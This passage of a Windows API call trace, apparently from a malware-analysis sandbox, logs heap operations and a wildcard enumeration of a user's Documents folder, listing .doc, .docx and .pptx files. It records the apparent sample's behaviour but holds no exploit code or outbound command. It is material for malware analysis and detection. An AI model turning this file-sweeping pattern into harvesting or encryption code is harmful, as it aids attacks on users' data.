lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0259.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0259.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x59) returned 0x240da88 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0259.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0259.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x24b1938, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.130] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0259.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.131] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0259.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0259.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce8da3d0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xce8da3d0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x260536, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0xaa57a0 [0259.133] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce8da3d0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xce8da3d0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x260536, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0259.133] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c9500, ftCreationTime.dwHighDateTime=0x1d4cdd0, ftLastAccessTime.dwLowDateTime=0x83454c40, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0x83454c40, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0x260536, dwReserved1=0x60, cFileName="1fyOaNMvpe0HLFYMO.doc", cAlternateFileName="1FYOAN~1.DOC")) returned 1 [0259.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0259.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c) returned 0x24b39d0 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0259.133] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.133] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0259.134] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3260 [0259.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0259.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.135] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.135] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.136] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0259.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0259.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.137] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.137] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.137] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaaf4150, ftCreationTime.dwHighDateTime=0x1d4f3a8, ftLastAccessTime.dwLowDateTime=0xbddeed30, ftLastAccessTime.dwHighDateTime=0x1d4f4f7, ftLastWriteTime.dwLowDateTime=0xbddeed30, ftLastWriteTime.dwHighDateTime=0x1d4f4f7, nFileSizeHigh=0x0, nFileSizeLow=0xbb35, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="2tDiT2As-QJTabaRcc L.pptx", cAlternateFileName="2TDIT2~1.PPT")) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3260 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0259.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.138] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.138] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.138] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.138] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3443a920, ftCreationTime.dwHighDateTime=0x1d4fa89, ftLastAccessTime.dwLowDateTime=0xbf6275a0, ftLastAccessTime.dwHighDateTime=0x1d48409, ftLastWriteTime.dwLowDateTime=0xbf6275a0, ftLastWriteTime.dwHighDateTime=0x1d48409, nFileSizeHigh=0x0, nFileSizeLow=0x7a1a, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="46_piKwe1cHySGVu21.docx", cAlternateFileName="46_PIK~1.DOC")) returned 1 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a64e980, ftCreationTime.dwHighDateTime=0x1d4c9e7, ftLastAccessTime.dwLowDateTime=0x582b0780, ftLastAccessTime.dwHighDateTime=0x1d4c608, ftLastWriteTime.dwLowDateTime=0x582b0780, ftLastWriteTime.dwHighDateTime=0x1d4c608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="52zSkSwJyavPCLOxO1y", cAlternateFileName="52ZSKS~1")) returned 1 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.139] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb5a550, ftCreationTime.dwHighDateTime=0x1d4b9e4, ftLastAccessTime.dwLowDateTime=0x51c1c680, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0x51c1c680, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0xfd98, dwReserved0=0x34aa550, 